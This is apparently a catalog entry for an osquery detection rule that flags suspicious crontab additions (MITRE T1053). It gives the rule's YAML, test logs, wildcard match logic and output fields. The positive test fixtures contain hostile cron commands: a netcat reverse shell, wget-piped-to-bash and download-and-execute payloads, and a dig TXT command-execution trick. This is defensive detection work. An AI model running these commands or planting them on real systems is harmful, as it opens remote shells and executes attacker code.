MITRE ATT&CK coverage
| Tactic | Techniques |
|---|---|
| Execution | T1053 Scheduled Task/Job |
Rule body

```yaml
AnalysisType: rule
Filename: osquery_suspicious_cron.py
RuleID: "Osquery.SuspiciousCron"
DisplayName: "Suspicious cron detected"
Enabled: true
LogTypes:
  - Osquery.Differential
Tags:
  - Osquery
  - Execution:Scheduled Task/Job
Reports:
  MITRE ATT&CK:
    - TA0002:T1053
Severity: High
Description: A suspicious cron has been added
Runbook: Analyze the command to ensure no nefarious activity is occurring
Reference: https://en.wikipedia.org/wiki/Cron
SummaryAttributes:
  - action
  - hostIdentifier
  - name
Tests:
  - Name: Netcat Listener
    ExpectedResult: true
    Log:
      {
        "name": "pack_incident-response_crontab",
        "hostIdentifier": "test-host",
        "action": "added",
        "columns":
          {
            "event": "",
            "minute": "17",
            "hour": "*",
            "day_of_month": "*",
            "month": "*",
            "day_of_week": "7",
            "command": "nc -e /bin/bash 237.233.242.58 80",
            "path": "/etc/crontab",
          },
      }
  - Name: Wget Pipe Bash
    ExpectedResult: true
    Log:
      {
        "name": "pack_incident-response_crontab",
        "action": "added",
        "hostIdentifier": "test-host",
        "columns":
          {
            "event": "",
            "minute": "17",
            "hour": "*",
            "day_of_month": "*",
            "month": "*",
            "day_of_week": "7",
            "command": "wget -qO- -U- https://sd9fd8f9d8fe.io/i.sh|bash >/dev/null 2>&1",
            "path": "/etc/crontab",
          },
      }
  - Name: Wget Execute
    ExpectedResult: true
    Log:
      {
        "name": "pack_incident-response_crontab",
        "action": "added",
        "hostIdentifier": "test-host",
        "columns":
          {
            "event": "",
            "minute": "17",
            "hour": "*",
            "day_of_month": "*",
            "month": "*",
            "day_of_week": "7",
            "command": "wget -O /tmp/load.sh http://test[.]io/load.sh; chmod 777 /tmp/load.sh; /tmp/load.sh >> /tmp/out.log",
            "path": "/etc/crontab",
          },
      }
  - Name: Dig
    ExpectedResult: true
    Log:
      {
        "name": "pack_incident-response_crontab",
        "action": "added",
        "hostIdentifier": "test-host",
        "columns":
          {
            "event": "",
            "minute": "17",
            "hour": "*",
            "day_of_month": "*",
            "month": "*",
            "day_of_week": "7",
            "command": '/bin/sh -c "sh -c $(dig logging.chat TXT +short @pola.ns.cloudflare.com)"',
            "path": "/etc/crontab",
          },
      }
  - Name: Built-in Cron
    ExpectedResult: false
    Log:
      {
        "name": "pack_incident-response_crontab",
        "action": "added",
        "hostIdentifier": "test-host",
        "columns":
          {
            "event": "",
            "minute": "17",
            "hour": "*",
            "day_of_month": "*",
            "month": "*",
            "day_of_week": "7",
            "command": "root cd / && run-parts --report /etc/cron.hourly",
            "path": "/etc/crontab",
          },
      }
  - Name: Command with quotes
    ExpectedResult: false
    Log:
      {
        "name": "pack_incident-response_crontab",
        "action": "added",
        "hostIdentifier": "test-host",
        "columns":
          {
            "event": "",
            "minute": "17",
            "hour": "*",
            "day_of_month": "*",
            "month": "*",
            "day_of_week": "7",
            "command": "runit 'go fast'",
            "path": "/etc/crontab",
          },
      }
```
Detection logic
Condition
name contains "crontab"
columns.command is_not_null
columns.command wildcard "*|*sh" or columns.command wildcard "*sh -c *"
This rule also runs imperative logic the parser cannot express as a filter; the conditions above are the structured part it could extract.
Indicators
Each row is a field, operator, and value that the rule matches. The corpus column counts how many other rules in the catalog look for the same combination: high numbers point to widely-used, community-vetted indicators. Blank or 1 shows that the indicator is specific to this rule.
| Field | Kind | Values |
|---|---|---|
| columns.command | is_not_null | |
| columns.command | wildcard | `*\|*sh`, `*sh -c *` |
| name | contains | `crontab` |
Output fields
Fields the rule emits when it matches. Chronicle authors list these in the outcome block; they appear on the detection and $risk_score drives alerting. Sentinel / Defender XDR rules build them up through project / summarize / extend stages. Sentinel maps these into alert fields via entityMappings and customDetails; Defender XDR custom detections surface them as alert fields directly.
| Field |
|---|
| hostIdentifier |